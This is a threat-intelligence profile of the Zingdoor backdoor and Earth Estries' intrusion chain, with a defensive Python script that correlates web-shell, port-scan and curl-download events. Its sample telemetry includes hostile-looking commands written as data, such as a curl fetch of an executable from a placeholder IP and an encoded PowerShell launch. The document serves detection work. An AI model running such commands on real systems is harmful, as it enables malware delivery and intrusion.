Zingdoor is an HTTP backdoor written in Go (Golang) that is frequently deployed by the cyber-espionage group Earth Estries. The malware reaches systems through suspicious downloads, emails, or websites; once inside, it can disrupt operations, steal personal information, or hold data to ransom. Zingdoor is one component of a diverse Earth Estries toolkit for taking control of target machines, alongside Cobalt Strike, Snappybee, and other tools such as ChinaChopper, PortScan, and NinjaCopy.
In one observed infection chain, Earth Estries exploited vulnerable Exchange servers using web shells and deployed several backdoors, including Zingdoor, Snappybee, and Cobalt Strike. After a port-scanning step, a set of Zingdoor samples was downloaded, illustrating a different approach in which diverse malware and utility tools were delivered via curl downloads. In some cases, Zingdoor served as the first-stage backdoor, indicating its role in initiating the intrusion.
In the later stages of the attack routine, we observed additional backdoors being deployed successively through the ones already installed, typically from Zingdoor to Snappybee and then to Cobalt Strike, although the order of deployment varied. Lateral movement within the network was performed by the initial backdoor, followed by installations of Zingdoor and Snappybee (Deed RAT) on other machines. Snappybee, also known as Deed RAT, is a modular backdoor reported to be the successor to ShadowPad, and it is primarily executed through DLL sideloading.
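The chain described above (web shell on an Exchange server, a port-scanning step, then curl downloads of the next-stage tools) lends itself to a simple behavioural correlation over process-creation telemetry. The following is an added defender-side example, not code from any report on Earth Estries; the events are constructed, and the process names it keys on (w3wp.exe as the IIS worker hosting Exchange, portscan.exe as the scanner, curl.exe as the downloader) are assumptions for the demonstration.

```python
"""Correlate web-shell spawn -> port scan -> curl download per host.
Added illustration; the telemetry below is constructed, and the process
names (w3wp.exe, portscan.exe, curl.exe) are assumptions for the demo."""
from datetime import datetime, timedelta

# Constructed sample events: (host, time, parent_image, image, command_line)
EVENTS = [
    ("mail01", "2024-01-10T08:00:00", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("mail01", "2024-01-10T08:04:00", "cmd.exe", "portscan.exe", "portscan.exe 10.0.0.0/24 445"),
    ("mail01", "2024-01-10T08:09:00", "cmd.exe", "curl.exe",
     "curl.exe -o C:\\Windows\\Temp\\svc.exe http://198.51.100.7/svc.exe"),
    # Benign download from a user session: no web-shell or scan stage before it
    ("ws07", "2024-01-10T09:00:00", "explorer.exe", "curl.exe",
     "curl.exe -o report.pdf https://intranet.example/report.pdf"),
    # Partial chain on mail02: shell from w3wp.exe, download a day later, no scan
    ("mail02", "2024-01-10T10:00:00", "w3wp.exe", "powershell.exe", "powershell.exe -enc AAAA"),
    ("mail02", "2024-01-11T10:00:00", "cmd.exe", "curl.exe", "curl.exe -o a.exe http://203.0.113.5/a.exe"),
]

STAGES = ["webshell", "portscan", "download"]  # order the page describes


def classify(parent, image, cmdline):
    """Map one process-creation event to a chain stage, or None if unrelated."""
    img, cmd = image.lower(), cmdline.lower()
    if parent.lower() == "w3wp.exe" and img in {"cmd.exe", "powershell.exe"}:
        return "webshell"        # web server worker spawning a shell
    if "portscan" in img:
        return "portscan"        # scanner named after the tool listed on the page
    if img == "curl.exe" and "http" in cmd and cmd.endswith(".exe"):
        return "download"        # curl fetching an executable payload
    return None


def correlate(events, window=timedelta(hours=1)):
    """Return {host: chain_start} for hosts showing all stages in order within window."""
    by_host = {}
    for host, ts, parent, image, cmdline in sorted(events, key=lambda e: e[1]):
        stage = classify(parent, image, cmdline)
        if stage is not None:
            by_host.setdefault(host, []).append((datetime.fromisoformat(ts), stage))
    hits = {}
    for host, seen in by_host.items():
        idx, start = 0, None       # idx = next stage we expect for this host
        for when, stage in seen:
            if stage == STAGES[idx] and (start is None or when - start <= window):
                start = start or when
                idx += 1
                if idx == len(STAGES):
                    hits[host] = start
                    break
    return hits
```

Running `correlate(EVENTS)` flags only mail01; the lone benign curl on ws07 and the scan-less pair on mail02 produce no alert, which is the point of requiring the ordered sequence rather than any single stage.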
Description last updated: 2024-11-11T14:44:07.172Z